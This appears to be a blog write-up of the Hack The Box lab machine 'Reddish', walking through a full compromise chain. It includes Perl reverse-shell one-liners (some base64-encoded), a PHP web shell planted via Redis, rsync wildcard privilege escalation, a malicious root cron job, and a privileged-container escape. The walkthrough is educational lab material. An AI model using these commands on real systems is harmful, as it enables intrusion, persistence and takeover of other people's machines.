Hack The Box | Reddish | Write Up

Diving deep into the realms of ⚔️ HackTheBox 👽, I took on one of its most challenging monsters: Reddish! After a week of intense battles, deciphering and decoding, I can finally say: I conquered it! 💥. Not only was it an insane level machine that tested every bit of my knowledge and patience, but it also marked my initiation into the league of tackling such daunting challenges 🖥️.

Why did I pick this beast, you ask? Well, my aim was to enhance my pivoting 🦘 techniques and embrace the hardcore OSCP approach ☠️. hashtag#Reddish gave me the perfect playground to hone those skills ⭐.

Gear up, dive in, and let’s decode this journey together. 🛸 ¡¡¡Happy Hacking!!! 🛸

Like always let’s start with a NMAP scan:

sudo nmap -n -Pn -sS -p- --min-rate=5000 -vvv

We have found one port open:

1880/tcp open  vsat-control syn-ack ttl 62

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 13.85 seconds
           Raw packets sent: 69697 (3.067MB) | Rcvd: 68911 (2.756MB)

Let’s run some NMAP script to check the service:

sudo nmap -n -Pn -sS -sVC -p 1880 --min-rate=5000 -vvv

We can see that the service run a Node.js Express Framework and it accept some HTTP-Methods (POST GET HEAD OPTIONS):

1880/tcp open  http    syn-ack ttl 62 Node.js Express framework
| http-methods: 
|_  Supported Methods: POST GET HEAD OPTIONS
|_http-favicon: Unknown favicon MD5: 818DD6AFD0D0F9433B21774F89665EEA
|_http-title: Error

Let’s check if we can reach this server through our navigator:

Let’s intercept this request and try to perform a POST request:


Then we will receive a interesting reply that contain some information that looks we can format to access to another site:


Let’s try to format our request to access to it:

We have found “Node-RED” that is a tool to develop code with visuals methods. After some researching I have found this article POST and more that explain how to exploit it and get reverse shell. First of all we will need to perform this workflow:

  • Input – TCP:
  • Advanced – exec:
  • Output – TCP:

In this point now we will start our listener server with netcat:

sudo nc -nlvp 4444

Let’s execute our workflow:


Then we will receive our reverse shell but without all the functionalities:


Now we can start to perform enumeration into this machine. After check some tools we can see that the machine doesn’t has the tipical tools but it has perl. Let’s check the interfaces:

ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet scope host lo
       valid_lft forever preferred_lft forever
11: eth0@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever
17: eth1@if18: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:ac:13:00:04 brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth1
       valid_lft forever preferred_lft forever

First, we can try to improve our shell with a reverse shell in perl:

perl -e 'use Socket;$i="";$p=5000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

First we will need to start our second listener server:

sudo nc -nlvp 5000

Then we will receive our shell:


Now we will improve our shell:

script /dev/null -c bash
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bash

Once we have our shell we will start enumerate the server:

hostname -I

We will see that the server has two different IPs:


Let’s check the ARP table:

cat /proc/net/arp

We will see probably two IPs that are the host:


At this point we have discovered other network. Let’s check the active hosts in the network with this script. To do the transfer of this script we will use base64:

#KALI -> base64 -w0 enum.sh

#MACHINE -> echo "IyEgL3Vzci9iaW4vZW52IGJhc2gKIwojIEF1dGhvcjogQmVydCBWYW4gVnJlY2tlbSA8YmVydC52YW52cmVja2VtQGdtYWlsLmNvbT4KIwojIFBlcmZvcm0gYSBwaW5nIHN3ZWVwIG9uIHRoZSBzcGVjaWZpZWQgY2xhc3MgQyBuZXR3b3JrCgpzZXQgLW8gZXJyZXhpdCAjIGFib3J0IG9uIG5vbnplcm8gZXhpdHN0YXR1cwpzZXQgLW8gbm91bnNldCAjIGFib3J0IG9uIHVuYm91bmQgdmFyaWFibGUKCiN7e3sgRnVuY3Rpb25zCgp1c2FnZSgpIHsKY2F0IDw8IF9FT0ZfClVzYWdlOiAkezB9IE5FVFdPUksKCiAgTkVUV09SSyAgdGhlIG5ldHdvcmsgcGFydCBvZiBhIGNsYXNzIEMgSVAgYWRkcmVzcywgZS5nLiAxOTIuMTY4LjEKCl9FT0ZfCn0KCiMgVXNhZ2U6IGhvc3RfaXNfdXAgSVAKIyB3aXRoIElQIGEgKGZ1bGwpIElQIGFkZHJlc3MuIFJldHVybnMgZXhpdCBzdGF0dXMgMCBpZiB0aGUgc3BlY2lmaWVkIGhvc3QKIyByZXBsaWVzIHRvIHRoZSB0d2VldCwgYSBub256ZXJvIGV4aXQgc3RhdHVzIG90aGVyd2lzZS4KaG9zdF9pc191cCgpIHsKICAjIFNlbmQgb25lIHBpbmcgKC1jKSBhbmQgd2FpdCBhdCBtb3N0IDEgc2Vjb25kICgtdykKICBwaW5nIC1jIDEgLXcgMSAiJHtpcH0iID4gL2Rldi9udWxsIDI+JjEKfQoKI319fQoje3t7IENvbW1hbmQgbGluZSBwYXJzaW5nCgppZiBbICIkIyIgLW5lICIxIiBdOyB0aGVuCiAgICBlY2hvICJFeHBlY3RlZCAxIGFyZ3VtZW50LCBnb3QgJCMiID4mMgogICAgdXNhZ2UKICAgIGV4aXQgMgpmaQoKI319fQoje3t7IFZhcmlhYmxlcwoKbmV0d29yaz0iJHsxfSIKCiN9fX0KCiMgU2NyaXB0IHByb3BlcgoKZm9yIGhvc3QgaW4gJChzZXEgMSAyNTQpOyBkbwoKICBpcD0iJHtuZXR3b3JrfS4ke2hvc3R9IgoKICBpZiBob3N0X2lzX3VwICIke2lwfSI7IHRoZW4KICAgIGVjaG8gIiR7aXB9IgogIGZpCgpkb25lCg==" > enum.b64

#MACHINE -> base64 -d enum.b64 > enum.sh

#KALI -> md5sum enum.sh

#MACHINE -> md5sum enum.sh

Once we already have our script we can run it but we will run it with the new network that we have discovered:

root@nodered:/tmp# ./enum.sh 172.19.0

Once we have run the script we will see that we have discovered 3 more assets:


Let’s check the other network:

root@nodered:/tmp# ./enum.sh 172.18.0

And we will see the address that we already know:


Now we will check the open ports of these new IPs with this script. We will use the same technique did it before to transfer it to the machine:

root@nodered:/tmp# ./portScan.sh -i -p 10000

After execute the script we will discover some open ports (80 and 6379):

# ./portScan.sh -i -p 10000 is open
# ./portScan.sh -i -p 10000 is open

At this point we have some open ports in other network that means we should perform pivoting to reach the others servers. To do that we will use “chisel”. To compile chisel we will need the version 17.7 of go and we can use this guide to install it:

└─$ git clone https://github.com/jpillora/chisel.git

└─$ cd chisel

└─$ go build .

└─$ go build -ldflags "-s -w" .

└─$ upx chisel
                       Ultimate Packer for eXecutables
                          Copyright (C) 1996 - 2020
UPX 3.96        Markus Oberhumer, Laszlo Molnar & John Reiser   Jan 23rd 2020

        File size         Ratio      Format      Name
   --------------------   ------   -----------   -----------
   8134656 ->   3137844   38.57%   linux/amd64   chisel                        

Packed 1 file.

To download the file we will use a bash function. We can find it here. Just copy it into our shell:

function __curl() {
  read proto server path <<<$(echo ${1//// })
  DOC=/${path// //}
  [[ x"${HOST}" == x"${PORT}" ]] && PORT=80

  exec 3<>/dev/tcp/${HOST}/$PORT
  echo -en "GET ${DOC} HTTP/1.0rnHost: ${HOST}rnrn" >&3
  (while read line; do
   [[ "$line" ==

Now we can turn on our provisional web server:

python -m http.server  8888

Once we have our web server we can execute the function:

root@nodered:/tmp# __curl > chisel

Just to be sure we can check with md5sum if we have downloaded correctly the binary:

└─$ md5sum chisel         
cac0ab6d8fcea44b130a7c2733e1c1c9  chisel

root@nodered:/tmp# md5sum chisel
md5sum chisel
cac0ab6d8fcea44b130a7c2733e1c1c9  chisel

Now we have our chisel binary into the machine. We need to reach the server from our Kali Linux. To start we need a chisel server into our Kali Linux to receive the connection from the server that we have access:

└─$ ./chisel server --reverse -p 5001    
2023/10/18 13:53:05 server: Reverse tunnelling enabled
2023/10/18 13:53:05 server: Fingerprint 9iN/TBkDUZ31yUlBP1CRPbXvY4FJSP2EN/NOvSTUIZM=
2023/10/18 13:53:05 server: Listening on

After execute our chisel server we need to execute the client into the machine we have access to get communication with the other server through the server that we already have access from our Kali Linux:

root@nodered:/tmp# ./chisel client R:80: &
./chisel client R:80: &
[1] 18237
023/10/18 11:55:56 client: Connecting to ws://
2023/10/18 11:55:57 client: Connected (Latency 27.687025ms)

Now we should have access to the server to the web server through our machine passing through the machine that we had access:


If we check the code we will see that exist some interesting comments and a javascript function that count how much time we tried to access to the web page:


Also if we inspect the code we can see that the number of hits increment each time:


If we check the function “backupDatabase” we will see a new directory “8924d0549008565c554f8128cd11fda4/ajax.php?backup=...” but we don’t have access:


We don’t have more information about the server so let’s look the other server to check the port “6379”. To do that we will need to create other tunnel to reach the server from our Kali Linux through the server that we have access:

./chisel client R:6379: &

Now we have access to the IPs and from our machine:


After communicate our machine we can perform a NMAP scan over the port:

sudo nmap -n -Pn -sV -p 6379

We will discover a new service called “Redis 4.0.9”:

└─$ sudo nmap -n -Pn -sV -p 6379
[sudo] password for david: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-10-18 14:27 CEST
Nmap scan report for
Host is up (0.000052s latency).

6379/tcp open  redis   Redis key-value store 4.0.9

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.93 seconds

After check some links I have found this guide to know how to exploit this service in HackTricks. Let’s do some enumeration over the service:

  • Enumerate databases:
COMMAND: INFO keyspace
# Keyspace
  • Choose the database:
  • Check the keys of the database:
  • Check the value of the key:

The value of the key hits is “2” we can say that the database is the web server database running in the server “”. I would say that they are connected. If we check Hack Tricks we can see that we have an option to upload a web shell through the service:


But we will need a static directory and if you remember we had discovered one:


I would say that the default route is “/var/www/html” so let’s replicate the steps from Hack Tricks to see if we can obtain a PHP web shell:

└─$ sudo apt -y install redis-tools

└─$ sudo redis-cli -h flushall

└─$ sudo redis-cli -h> config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
OK> config set dbfilename wshell.php
OK> set test "<?php system($_REQUEST['cmd']); ?>"
OK> save

Now we can check if we have access to our web shell:


I have noticed that the system has some kind of script that delete the files so we can make a little script to upload again our php shell:

└─$ cat uploadShell.sh 

redis-cli -h config set dir /var/www/html/8924d0549008565c554f8128cd11fda4
redis-cli -h config set dbfilename wshell.php
redis-cli -h set test "<?php system($_REQUEST['cmd']); ?>"
redis-cli -h save

Let’s keep doing enumeration:


We will discover a new network segment:


In this point we need to improve our shell into the machine “” that’s means we will need to get a reverse shell but now we are working through the server “nodered:” so we will need use the tool “Socat” that allow us to redirect the reverse shell from the “nodered” host that receive the reverse shell from the machine “” to our Kali Linux. To do that first of all we will need to transfer the socat binary to the machine “nodered” and we will use the web server we already have. We can download it with the next perl command:

perl -e 'use File::Fetch;$url = "";$ff = File::Fetch->new(uri => $url);$file = $ff->fetch() or die $ff->error;'

Give to it execution permission:

root@nodered:/tmp# chmod +x socat

Now we will prepare our listener server to receive the reverse shell from “” through “nodered” to our Kali Linux

└─$ sudo nc -nlvp 5002         
[sudo] password for david: 
listening on [any] 5002 ...

Once we have our listener in the “nodered” machine we will forward the reverse shell with next socat command:

root@nodered:/tmp# ./socat TCP-LISTEN:6000,fork TCP: &

Upload again the web shell with our script:

└─$ ./uploadShell.sh                 

And now we will execute this payload into our web shell to get our reverse shell:

  • Original
perl -e 'use Socket;$i="";$p=6000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • URL encoded:

In the end we should have something like this:


Then we will receive our reverse shell from the server “”:


Before start to enumerate the server let’s improve our shell. Once we have our shell we can check the home directory and we will see that we can’t access any home directory:


If we keep doing enumeration we will see the “backup” directory and it is very interesting:


We have found a backup script:


This script does a backup of the files “.rdb” into the directory “/var/www/html/f187a0ec71ce99642e4f0afbd441a68b” and it is synchronizing with the host “backup:837” that means probable we have discovered another server but let’s check if we can perform privilege escalation through the rsync binary: GFTBins. We have found how to perform a privilege escalation with rsync. First of all we will execute another socat tunnel to receive the root reverse shell in our kali linux:

root@nodered:/tmp# ./socat TCP-LISTEN:6001,fork TCP: &

Now we will create the file “perlRev.rdb” with the reverse shell code:

└─$ cat perlRev.rdb                         
perl -e 'use Socket;$i="";$p=6001;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

We can transfer the file with base64:

#KALI -> base64 -w0 perlRev.rdb

#MACHINE -> echo "cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTcyLjE5LjAuNCI7JHA9NjAwMTtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsnCg==" > perlRev.b64

#MACHINE -> base64 -d perlRev.b64 > perlRev.rdb

Now with all the resources prepared we can perform our privilege escalation. Move the file “perlRev.rdb” and create the file to execute it:

cp perlRev.rdb /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/

touch /var/www/html/f187a0ec71ce99642e4f0afbd441a68b/-e sh perlRev.rdb

Now when the script with rsync run we will receive our reverse shell with root rights because the script use wildcard to process the files and then the script with root privileges will execute “sh perlRev.rdb” with our reverse shell inside:


Also we will have access to the user flag:

# cd /home
# ls
# cd somaro
# cat user.txt

Well we need to keep enumerating the network to check how we can reach the root flag here. Let’s start to see if we have more server in the same network but first we need to transfer our scripts:

└─$ base64 -w0 pingScan.sh                                     

└─$ base64 -w0 portScan.sh 

# echo "IyEgL3Vzci9iaW4vZW52IGJhc2gKIwojIEF1dGhvcjogQmVydCBWYW4gVnJlY2tlbSA8YmVydC52YW52cmVja2VtQGdtYWlsLmNvbT4KIwojIFBlcmZvcm0gYSBwaW5nIHN3ZWVwIG9uIHRoZSBzcGVjaWZpZWQgY2xhc3MgQyBuZXR3b3JrCgpzZXQgLW8gZXJyZXhpdCAjIGFib3J0IG9uIG5vbnplcm8gZXhpdHN0YXR1cwpzZXQgLW8gbm91bnNldCAjIGFib3J0IG9uIHVuYm91bmQgdmFyaWFibGUKCiN7e3sgRnVuY3Rpb25zCgp1c2FnZSgpIHsKY2F0IDw8IF9FT0ZfClVzYWdlOiAkezB9IE5FVFdPUksKCiAgTkVUV09SSyAgdGhlIG5ldHdvcmsgcGFydCBvZiBhIGNsYXNzIEMgSVAgYWRkcmVzcywgZS5nLiAxOTIuMTY4LjEKCl9FT0ZfCn0KCiMgVXNhZ2U6IGhvc3RfaXNfdXAgSVAKIyB3aXRoIElQIGEgKGZ1bGwpIElQIGFkZHJlc3MuIFJldHVybnMgZXhpdCBzdGF0dXMgMCBpZiB0aGUgc3BlY2lmaWVkIGhvc3QKIyByZXBsaWVzIHRvIHRoZSB0d2VldCwgYSBub256ZXJvIGV4aXQgc3RhdHVzIG90aGVyd2lzZS4KaG9zdF9pc191cCgpIHsKICAjIFNlbmQgb25lIHBpbmcgKC1jKSBhbmQgd2FpdCBhdCBtb3N0IDEgc2Vjb25kICgtdykKICBwaW5nIC1jIDEgLXcgMSAiJHtpcH0iID4gL2Rldi9udWxsIDI+JjEKfQoKI319fQoje3t7IENvbW1hbmQgbGluZSBwYXJzaW5nCgppZiBbICIkIyIgLW5lICIxIiBdOyB0aGVuCiAgICBlY2hvICJFeHBlY3RlZCAxIGFyZ3VtZW50LCBnb3QgJCMiID4mMgogICAgdXNhZ2UKICAgIGV4aXQgMgpmaQoKI319fQoje3t7IFZhcmlhYmxlcwoKbmV0d29yaz0iJHsxfSIKCiN9fX0KCiMgU2NyaXB0IHByb3BlcgoKZm9yIGhvc3QgaW4gJChzZXEgMSAyNTQpOyBkbwoKICBpcD0iJHtuZXR3b3JrfS4ke2hvc3R9IgoKICBpZiBob3N0X2lzX3VwICIke2lwfSI7IHRoZW4KICAgIGVjaG8gIiR7aXB9IgogIGZpCgpkb25lCg==" > pingScan.b64

# echo "IyEvYmluL2Jhc2gKI1ZhcmlhYmxlcwplbXB0eT0iIgojQXJndW1lbnRzIGZvciB0aGUgc2NyaXB0CndoaWxlIFsgIiQxIiAhPSAiIiBdOyBkbwoJY2FzZSAiJDEiIGluCgkJLWkgfCAtLWlwICkJCWlwPSIkMiI7CXNoaWZ0OzsKCQktcCB8IC0tcG9ydHMgKQkJcG9ydHM9IiQyIjsJc2hpZnQ7OwoJZXNhYwoJc2hpZnQKZG9uZQojQ2hlY2tpbmcgaWYgdGhlIC1pIGlzIGVtcHR5CmlmIFtbICRpcCA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IGFuIElQIGFkZHJlc3Mgd2l0aCAtaSIKCWV4aXQKZmkKI2NoZWNraW5nIGlzIC1wIGlzIGVtcHR5CmlmIFtbICRwb3J0cyA9PSAkZW1wdHkgXV07IHRoZW4KCWVjaG8gIlBsZWFzZSBzcGVjaWZ5IHRoZSBtYXggcG9ydCByYW5nZSAtcCIKCWV4aXQKZmkKI1NjYW5zIHBvcnRzL0R1bXBzIGNsb3NlZCBwb3J0cy9kaXNwbGF5cyBvcGVuIHBvcnRzCmZvciBpIGluICQoc2VxIDEgJHBvcnRzKTsgZG8KCSggZWNobyA+IC9kZXYvdGNwLyRpcC8kaSkgPiAvZGV2L251bGwgMj4mMSAmJiBlY2hvICRpcCI6IiRpICJpcyBvcGVuIjsKZG9uZQo=" > portScan.b64

# base64 -d pingScan.b64 > pingScan.sh

# base64 -d portScan.b64 > portScan.sh

Now we can execute both of them:

  • Ping Scan:
# ./pingScan.sh 172.20.0
  • Port Scan:
# ./portScan.sh -i -p 10000 is open

Looks like we have found the server that save the backups with the script we have found too. Let’s check if we can access to the server with rsync now that we are root:

# rsync rsync://backup:873    
src             src path
# rsync rsync://backup:873/src
drwxr-xr-x          4,096 2018/07/15 17:42:39 .
-rwxr-xr-x              0 2018/05/04 21:01:30 .dockerenv
-rwxr-xr-x            100 2018/05/04 19:55:07 docker-entrypoint.sh
drwxr-xr-x          4,096 2018/07/15 17:42:41 backup
drwxr-xr-x          4,096 2018/07/15 17:42:39 bin
drwxr-xr-x          4,096 2018/07/15 17:42:38 boot
drwxr-xr-x          4,096 2018/07/15 17:42:39 data
drwxr-xr-x          3,640 2023/10/18 19:45:50 dev
drwxr-xr-x          4,096 2023/10/18 23:51:31 etc
drwxr-xr-x          4,096 2018/07/15 17:42:38 home
drwxr-xr-x          4,096 2018/07/15 17:42:39 lib
drwxr-xr-x          4,096 2018/07/15 17:42:38 lib64
drwxr-xr-x          4,096 2018/07/15 17:42:38 media
drwxr-xr-x          4,096 2023/10/18 23:54:57 mnt
drwxr-xr-x          4,096 2018/07/15 17:42:38 opt
dr-xr-xr-x              0 2023/10/18 19:45:50 proc
drwxr-xr-x          4,096 2023/10/18 22:28:01 rdb
drwx------          4,096 2023/10/19 11:25:42 root
drwxr-xr-x          4,096 2023/10/18 23:55:10 run
drwxr-xr-x          4,096 2018/07/15 17:42:38 sbin
drwxr-xr-x          4,096 2018/07/15 17:42:38 srv
dr-xr-xr-x              0 2023/10/19 15:30:41 sys
drwxrwxrwt          4,096 2023/10/19 16:32:01 tmp
drwxr-xr-x          4,096 2018/07/15 17:42:39 usr
drwxr-xr-x          4,096 2018/07/15 17:42:39 var

We can see that we have complete access to the system file. Let’s try to get some reverse shell through a cron task but first we will need to have socat in the machine “” to redirect the reverse shell to nodered and from there to our kali linux. to do that we will use the tool “xclip” to copy the base64 output:

└─$ base64 -w0 socat | xclip -sel clip

# echo pastebase64code | base64 -d > socat

Now we have socat:


So we can start to execute the redirections with socat (

# ./socat TCP-LISTEN:7000,fork TCP: &

Now we will create in nodered the redirection to reach our Kali Linux:

# ./socat TCP-LISTEN:6002,fork TCP: &

Finally, we need to create our listener server to receive the reverse shell:

└─$ sudo nc -nlvp 5004       
[sudo] password for david: 
listening on [any] 5004 ...

Once we have our redirections already established we can try to transfer the malicious cron job with our reverse shell:

  • Create our reverse shell file “shell.sh” whit this content:
perl -e 'use Socket;$i="";$p=7000;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • Transfer the file to the “” server:
# echo cGVybCAtZSAndXNlIFNvY2tldDskaT0iMTcyLjIwLjAuMyI7JHA9NzAwMDtzb2NrZXQoUyxQRl9JTkVULFNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCJ0Y3AiKSk7aWYoY29ubmVjdChTLHNvY2thZGRyX2luKCRwLGluZXRfYXRvbigkaSkpKSl7b3BlbihTVERJTiwiPiZTIik7b3BlbihTVERPVVQsIj4mUyIpO29wZW4oU1RERVJSLCI+JlMiKTtleGVjKCIvYmluL3NoIC1pIik7fTsnCg== | base64 -d > shell.sh
  • Transfer the shell file to the backup server from the ( web server:
# rsync -a shell.sh rsync://backup:873/src/tmp/
# rsync rsync://backup:873/src/tmp/
drwxrwxrwt          4,096 2023/10/19 17:11:09 .
-rw-r--r--            220 2023/10/18 23:52:15 reverse.sh
-rw-r--r--            220 2023/10/19 17:09:39 shell.sh
  • Create the cron job into the web server (
# echo '* * * * * root sh /tmp/shell.sh' > shell
  • Transfer the cron job to the backup server:
# rsync -a shell rsync://backup:873/src/etc/cron.d/

Once the cron job is executed we will receive our reverse shell:


Once we have access to the container to reach the root flag we need mount one partition because we have completely access to the file system because the container is running with “—privileged” that provide us access tot the raw devices in /dev on the host. We can have more information here.

Now we need to mount one partition to have access to the root flag:

# mount /dev/sda2 /mnt
# ls /mnt/root/
# cat /mnt/root/root.txt  

After one week struggling with an insane machine from ⚔️ hashtag#HackTheBox 👽 I got it!!! hashtag#Reddish has been a challenge to me because it was my first insane machine 💥.

I did this retired machine 🖥️ because I was looking for improving my pivoting 🦘skills and use the OSCP style ☠️ to do it. It’s why I did this machine ⭐.

🛸 ¡¡¡Happy Hacking!!! 🛸

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.